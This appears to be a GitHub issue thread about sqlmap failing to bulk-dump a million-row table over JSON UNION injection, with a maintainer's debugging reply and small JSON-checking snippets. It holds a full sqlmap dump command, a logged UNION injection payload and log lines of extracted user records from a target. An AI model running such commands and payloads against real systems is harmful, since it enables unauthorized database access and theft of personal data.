Bug Description
sqlmap is failing to dump/parse a large table (1 million rows) after a successful JSON response using UNION injection.
Command: py sqlmap.py -u "https://targeturl.com" --data "{\"id\":\"55*\"}" --method POST -p id --technique=U --code 200 --union-cols=19 --union-char=589 --dbms=MySQL --timeout 100000 -D bigdb -T users --dump --proxy="http://127.0.0.1:8886" --no-escape --prefix="" --tamper tscript.py --ignore-code=502 --fresh-queries -v 3
Expected behavior
I successfully dumped an 80k-row table, but with the million-row table the bulk dump fails without showing any error, and sqlmap just falls back to retrieving entries row by row.
Screenshots
Running environment:
sqlmap version: 1.6.11.7#dev (latest)
Operating system: Windows 10
Python version: 3.7.4
Target details:
DBMS: MySQL
SQLi technique: UNION-based SQL injection (only)
no WAF
[21:48:18] [INFO] loading tamper module 'tscript'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y
JSON data found in POST body. Do you want to process it? [Y/n/q] y
[21:48:19] [INFO] testing connection to the target URL
[21:48:25] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
Parameter: JSON #1* ((custom) POST)
Type: UNION query
Title: Generic UNION query (589) - 22 columns (custom)
Payload: {"id":"55 UNION ALL SELECT 589,589,CONCAT('qqjzq','nYoBkEKKvvZpWJYHbxuXaTIDFgKRlJnwrurjpwSC','qjvjq'),589,589,589,589,589,589,589,589,589,589,589,589,589,589,589,589-- -"}
[21:48:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:48:25] [INFO] testing MySQL
[21:48:32] [INFO] confirming MySQL
[21:48:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.12.2
back-end DBMS: MySQL >= 8.0.0
[21:48:32] [INFO] fetching columns for table 'users' in database 'bigdb'
[21:48:32] [INFO] fetching entries for table 'users' in database 'bigdb'
[21:54:22] [WARNING] large response detected. This could take a while
[21:54:34] [INFO] retrieved: '2021-11-29 10:01:46','1',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ','[email protected]',' ',' ',' ',' ',...
[21:54:40] [INFO] retrieved: '2022-11-29 10:01:29','1',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ','[email protected]',' ',' ',...
[21:54:46] [INFO] retrieved: '2022-11-29 10:01:05','1',' ',' ',' ',' ',' ',' ',' ',' ',' ',' ','[email protected]',' ',' ',' ',' ','000...
sqlmap doesn't like page responses greater than 100 MB, while you have approximately 16 MB here (so there should be no issue from the low-level perspective)
there is a possibility that the content is trimmed or otherwise mangled
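For what it's worth, a quick sanity check for trimming (purely an illustrative helper, not sqlmap code): a trimmed response usually arrives shorter than the Content-Length the server declared.

```python
# illustrative helper (not part of sqlmap): detect a body that arrived
# shorter than the server's declared Content-Length, i.e. a trimmed response
def looks_trimmed(headers: dict, body: bytes) -> bool:
    declared = headers.get("Content-Length")
    if declared is None:
        return False  # chunked/undeclared length, nothing to compare against
    return len(body) < int(declared)
```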
I am missing the JSON payload in your console output (it would be shown with -v 3)
I would suggest you rerun everything with -v 3 -t traffic.txt and actually inspect the payload and content being sent. There is a high possibility that the content has been trimmed or tampered with so that it contains non-parsable JSON
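Once you have traffic.txt, you can save a suspicious response body to a file and check whether it is complete, well-formed JSON; a minimal sketch (the file name is just an example):

```python
import json

# minimal sketch: verify that a saved response body is parsable JSON
# rather than a trimmed fragment; a truncated dump typically fails
# near the very end of the buffer
def check_body(path: str) -> None:
    with open(path, "rb") as f:
        body = f.read()
    try:
        json.loads(body)
        print(f"{path}: valid JSON ({len(body)} bytes)")
    except json.JSONDecodeError as exc:
        print(f"{path}: broken JSON at char {exc.pos} of {len(body)}: {exc.msg}")

check_body("response_body.json")  # example body extracted from traffic.txt
```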
one more thing: you are able to run Burp and take screenshots, yet you are not able to debug what is going on in the request/response. Honestly, I dislike this kind of issue, because you skipped your responsibility to find anything useful yourself and jumped straight to the sqlmap issue pages